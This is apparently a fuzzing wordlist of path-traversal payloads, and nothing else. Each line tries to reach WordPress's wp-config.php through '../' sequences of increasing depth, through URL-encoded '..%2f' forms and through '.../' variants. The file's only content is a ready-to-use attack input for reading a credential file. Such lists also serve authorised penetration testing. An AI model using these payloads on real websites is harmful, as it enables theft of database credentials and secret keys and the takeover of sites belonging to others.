../wp-config.php
../../wp-config.php
../../../wp-config.php
../../../../wp-config.php
../../../../../wp-config.php
../../../../../../wp-config.php
../../../../../../../wp-config.php
../../../../../../../../wp-config.php
..%2fwp-config.php
..%2f..%2fwp-config.php
..%2f..%2f..%2fwp-config.php
..%2f..%2f..%2f..%2fwp-config.php 
..%2f..%2f..%2f..%2f..%2fwp-config.php
..%2f..%2f..%2f..%2f..%2f..%2fwp-config.php
..%2f..%2f..%2f..%2f..%2f..%2f..%2fwp-config.php
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwp-config.php 
.../wp-config.php
.../.../wp-config.php
.../.../.../wp-config.php
.../.../.../.../wp-config.php
.../.../.../.../.../wp-config.php
.../.../.../.../.../.../wp-config.php
.../.../.../.../.../.../.../wp-config.php
.../.../.../.../.../.../.../.../wp-config.php